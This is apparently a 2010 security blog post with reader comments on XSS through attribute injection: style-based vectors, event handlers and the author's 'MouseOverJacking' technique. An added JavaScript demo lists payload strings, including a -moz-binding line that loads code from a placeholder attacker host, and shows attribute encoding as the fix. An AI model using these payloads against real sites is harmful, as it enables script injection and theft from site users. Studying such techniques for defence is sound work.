If a Cross-Site Scripting attack cannot use any tags or angle brackets on the target site, it is still possible to conduct it through a tag's attributes. These can be the style attribute, various event handlers, or sometimes the src attribute. The attack needs quotes (single or double; occasionally no quote is needed at all) in order to break out of the attribute value into which our input lands and append a new attribute to the tag that carries the code.

When attacking via the style attribute, the following methods are used (in all of them the code executes automatically when the page is opened):

1. Via expression(), which works only in Internet Explorer (before IE8).
2. Via background:url() or background-image:url() with a javascript: or vbscript: URI, which works only in Internet Explorer.
3. Via -moz-binding:url(), which works only in Mozilla Firefox and other browsers on the Gecko engine (before Firefox 3).

A chance to use onerror, onload or onunload does not come up very often, and the other handlers do not fire automatically, so they are less popular for XSS attacks. Attacks via the style attribute are used most often.
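The attribute injection described above, as an added example that is not code from the original article: a site rejects angle brackets, but user input is placed inside a quoted attribute without encoding, so a quote breaks out of the value and a new attribute (style or an event handler) is appended. The template, the filter, the payloads and the host name in them are constructed for this demo; the viewport-covering style on the onmouseover payload is an assumption about how a hover can be made to happen on any mouse movement, not the specifics of the MouseOverJacking article.

```javascript
// Added example, not code from the original article.
// Demonstrates attribute injection when '<' and '>' are filtered, and the
// attribute encoding that prevents it. Everything here is constructed for the demo.

// The filter the article assumes: any '<' or '>' in the input is rejected.
function rejectsAngleBrackets(input) {
  return /[<>]/.test(input);
}

// Vulnerable rendering: raw input lands inside a double-quoted attribute value.
function renderVulnerable(input) {
  return '<input type="text" name="q" value="' + input + '">';
}

// Hardened rendering: encode the characters that can end or alter an attribute.
function encodeAttr(s) {
  var map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, function (c) { return map[c]; });
}
function renderHardened(input) {
  return '<input type="text" name="q" value="' + encodeAttr(input) + '">';
}

// Attribute names of a single tag, in order. Enough for this demo,
// not a general HTML parser.
function attributeNames(tag) {
  var names = [];
  var re = /\s([a-zA-Z-]+)\s*=\s*(?:"[^"]*"|'[^']*'|[^\s>]*)/g;
  var m;
  while ((m = re.exec(tag)) !== null) {
    names.push(m[1].toLowerCase());
  }
  return names;
}

// Attributes the template never intended to emit.
var INTENDED = ['type', 'name', 'value'];
function injectedAttributes(render, payload) {
  return attributeNames(render(payload)).filter(function (n) {
    return INTENDED.indexOf(n) < 0;
  });
}

// Payloads in the style the article describes. None contains '<' or '>'.
// attacker.example is a placeholder host; alert(1) stands in for real code.
var PAYLOADS = {
  // style attribute, IE-only expression() (before IE8)
  ieExpression: '" style="width:expression(alert(1))',
  // style attribute, Gecko-only -moz-binding (before Firefox 3)
  mozBinding: '" style="-moz-binding:url(http://attacker.example/x.xml#b)',
  // event handler; the style that stretches the element over the page is an
  // assumption about how a hover can be made to fire on any mouse movement
  mouseOver: '" onmouseover="alert(1)" style="position:absolute;left:0;top:0;width:100%;height:100%'
};

// For each payload: does it pass the angle-bracket filter, and which extra
// attributes does each template end up emitting?
function report() {
  var out = {};
  Object.keys(PAYLOADS).forEach(function (k) {
    var p = PAYLOADS[k];
    out[k] = {
      passesFilter: !rejectsAngleBrackets(p),
      vulnerable: injectedAttributes(renderVulnerable, p),
      hardened: injectedAttributes(renderHardened, p)
    };
  });
  return out;
}

console.log(JSON.stringify(report(), null, 2));
```

Every payload passes the filter, and the vulnerable template emits the injected style or onmouseover attribute while the hardened one emits only the three intended attributes. Encoding the quote character is what closes the hole; filtering angle brackets alone does nothing against this class of attack.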

But as early as 2008 Firefox 3 removed the possibility of attack via -moz-binding (removed partly: it remains possible to attack using XML files on the same site), which I wrote about in the article XSS attacks in Mozilla Firefox via styles. And Internet Explorer 8, released at the beginning of 2009, removed support for expression(). Support for javascript: and vbscript: URIs in background and background-image may also be removed over time.

So in light of these events it has become harder to conduct automated XSS attacks in new browsers under such conditions (when no tags or angle brackets can be used). And the more widespread these browser versions become, the harder it will be to conduct XSS attacks under such conditions in an automated way, without requiring any action from the user. On the other hand, browsers such as Opera, Chrome and others are completely resistant to attacks via the style attribute.

To solve this problem the MouseOverJacking technique, which I already wrote about, can be used. This technique allows an automated XSS attack to be conducted. It is a cross-browser solution that works in all browsers, including IE8: when CSS is used (as in my PoCs) it bypasses IE8's built-in protection against Clickjacking.

I.e. MouseOverJacking can be used not only for the specific attacks discussed in the article about this technique, but for a wide variety of XSS attacks (in place of expression() and -moz-binding). The attack is fully automated, so its effectiveness is the same as with expression() and -moz-binding (and, being cross-browser, it reaches even more users).

Such attacks can be conducted both via MouseOverJacking and via Clickjacking. But MouseOverJacking is more effective: in a Clickjacking attack the victim must click (which does not always happen), while MouseOverJacking requires no action beyond a single mouse movement (which always happens).

So I propose using the MouseOverJacking technique for a wide variety of XSS attacks (when tags and angle brackets cannot be used). Security professionals and attackers alike can use this technique to create PoCs for XSS vulnerabilities or to conduct XSS attacks.

This entry was posted on 21:05 21.01.2010 and is filed under Articles (Статті).

I know about Content Security Policy. I wrote about it in November and at that time I tested how CSP works in my browsers. In Mozilla's CSP demo only two tests passed in both my old Mozilla and the new Firefox 3. So it is a solution for future versions of the Firefox browser (for now it is not relevant); we will see how it is implemented in the next versions of Firefox (in 3.7) and how other browser vendors act with CSP. But the idea is interesting and promising.

So for now the future of XSS attacks is not too dark. And the current mitigations of XSS in new versions of Firefox and IE I bypassed with my MouseOverJacking technique.

P.S.

And tell me, what do you think about using MouseOverJacking instead of expression() and -moz-binding for conducting XSS attacks as a cross-browser solution (which works in any browser, including new versions of Firefox and IE)?

You also tell me, what do you think about using MouseOverJacking instead of expression() and -moz-binding for conducting XSS attacks as a cross-browser solution (which works in any browser, including new versions of Firefox and IE)?

LoL, CSP on all websites in the world

Taking into account that XSS has been known since 1998 (persistent XSS was found in 1998 and the term Cross-Site Scripting was introduced in 2000, when reflected XSS was found), and that now, in 2010, after 12 years, we have a situation where 80-90% of web sites on the Internet have XSS holes, it is quite possible that nothing will change greatly in the next 10 years. So I share sirdarckcat's confidence in that (CSP will need to go a long way before it spreads enough).

And because CSP needs not only browser support but also server-side support (web developers need to set the X-Content-Security-Policy header in their web apps), it will take a long time for CSP to spread across the Internet. As web developers create XSS holes and often do not want to fix them (or do it slowly, or just ignore it), the same can happen with CSP.

about:
> You also tell me, what do you think about using MouseOverJacking
> instead of expression() and -moz-binding for conducting XSS attacks as
> a cross-browser solution (which works in any browser, including new
> versions of Firefox and IE)?

sirdarckcat, really? Because I thought XSS via styles (described in my article) was mostly used.

Are you talking about MouseOverJacking or about XSS via event handlers? Because these are different things, as I mentioned in my article MouseOverJacking attacks (read the "The idea of MouseOverJacking attacks" part of the article).

MouseOverJacking is an automated attack, while XSS via event handlers is not. I have been using XSS via event handlers for many years (the first time I mentioned such XSS at my site was regarding holes at cenzic.com and picosearch.com), but MouseOverJacking is a different thing. It uses both XSS holes (via onMouseOver) and special ways to make the attack fully automated, to make it comparable to attacks via styles.

As I mentioned in the current article, attacks via the style attribute are used most often (I also used them for many years in my PoCs). And taking into account the situation with modern browsers, I proposed my cross-browser solution.

Thanks for your feedback. It's important for me to know the thoughts of other security professionals on this topic.

I see that you are mature security professionals and it's hard to surprise you on this topic, but in any case there was something new for you in these two articles. And look in my article MouseOverJacking attacks: there are other attack vectors besides XSS (such as DoS, CSRF and others). And feel free to read my other articles, where you will certainly find something interesting and new for yourself.

I hope the article was interesting for you (as it seems, since you decided to translate it). And I hope my English version of the article was sufficiently clear for you. I can suggest some line breaks (indents) in the text of your version of my article; it would improve its readability.

And feel free to read my other articles (there are English versions of many of them, some published at my site and some on the WASC Mailing List).